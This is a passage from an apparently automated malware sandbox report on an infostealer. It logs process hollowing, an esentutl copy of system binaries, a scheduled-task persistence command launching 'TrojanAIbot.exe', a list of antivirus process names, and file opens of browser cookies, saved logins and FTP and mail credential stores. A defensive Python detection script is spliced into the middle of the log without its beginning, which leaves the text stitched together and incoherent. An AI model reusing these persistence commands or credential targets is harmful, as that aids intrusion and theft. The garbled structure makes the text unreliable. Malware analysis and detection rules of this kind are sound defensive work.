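Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section unmapped: C:\Windows\SysWOW64\timeout.exe base address: 400000
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3B2008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3CC008
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
"""

EVENT_RE = re.compile(
    r"^Source:\s+(?P<src>\S+)\s+"
    r"(?P<kind>Process created|Memory allocated|Section unmapped|Memory written):\s+"
    r"(?P<target>\S+)\s*(?P<rest>.*)$"
)
IMAGE_BASE = "400000"  # default image base of a 32-bit PE; hollowing replaces it
# Paths a standard user can write to: C:\Users\Public\... and ...\Users\<x>\AppData\...
USER_WRITABLE = re.compile(r"(?i)\\Users\\(?:Public|[^\\]+\\AppData)\\")


def parse_events(text):
    """Return (source, kind, target, rest); 'rest' is the command line or address info."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append((m["src"], m["kind"], m["target"], m["rest"]))
    return events


def hollowing_indicators(events):
    """Correlate memory events per (source, target) pair into a hollowing verdict."""
    flags = defaultdict(set)
    for src, kind, target, rest in events:
        key = (src, target)
        if kind == "Process created":
            flags[key].add("created")
        elif kind == "Section unmapped" and rest.endswith(IMAGE_BASE):
            flags[key].add("unmapped_image_base")
        elif kind == "Memory allocated" and f"base: {IMAGE_BASE}" in rest and "execute" in rest:
            flags[key].add("rwx_alloc_image_base")
        elif kind == "Memory written":
            flags[key].add("memory_written")
    verdicts = {}
    for key, found in flags.items():
        if found == {"created"}:  # plain child creation is not evidence by itself
            continue
        verdicts[key] = ("hollowing" if len(found) >= 3 else "memory-tampering", sorted(found))
    return verdicts


def _normalise(cmd):
    """The report doubles backslashes inside some command lines; fold them back."""
    return cmd.replace("\\\\", "\\")


def rule_defender_exclusion(image, cmd):
    return image.lower().endswith("powershell.exe") and \
        re.search(r"(?i)Add-MpPreference\s+-Exclusion", cmd) is not None


def rule_esentutl_copy(image, cmd):
    """esentutl /y <src> /d <dst> copies a file; flag System32 binaries copied to user paths."""
    if not image.lower().endswith("esentutl.exe"):
        return False
    m = re.search(r"(?i)/y\s+(\S+)\s+/d\s+(\S+)", cmd)
    return bool(m) and "\\system32\\" in m.group(1).lower() and bool(USER_WRITABLE.search(m.group(2)))


def rule_schtasks_userland(image, cmd):
    if not image.lower().endswith("schtasks.exe") or "/create" not in cmd.lower():
        return False
    m = re.search(r'(?i)/tr\s+(?:"([^"]+)"|(\S+))', cmd)
    return bool(m) and bool(USER_WRITABLE.search(m.group(1) or m.group(2)))


RULES = {
    "defender_exclusion_added": rule_defender_exclusion,
    "esentutl_lolbin_copy": rule_esentutl_copy,
    "schtasks_userland_persistence": rule_schtasks_userland,
    "execution_from_user_writable_dir": lambda image, cmd: bool(USER_WRITABLE.search(image)),
    "pif_extension_executable": lambda image, cmd: image.lower().endswith((".pif", ".com", ".scr")),
}


def match_rules(events):
    """Run every rule over the 'Process created' events; returns rule -> [(parent, image)]."""
    hits = defaultdict(list)
    for src, kind, image, cmd in events:
        if kind == "Process created":
            cmd = _normalise(cmd)
            for name, rule in RULES.items():
                if rule(image, cmd):
                    hits[name].append((src, image))
    return dict(hits)
```

On a live host the same logic applies to Sysmon process-creation (event 1) and process-access/tamper telemetry; the report's doubled backslashes are an artefact of how the sandbox renders esentutl's command line, which is why the command line is normalised before the rules run.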
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02E65ACC
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: GetLocaleInfoA, 0_2_02E6A7C4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02E65BD8
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: GetLocaleInfoA, 0_2_02E6A810
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6920C GetLocalTime, 0_2_02E6920C
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6B78C GetVersionExA, 0_2_02E6B78C
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2164, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2164, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED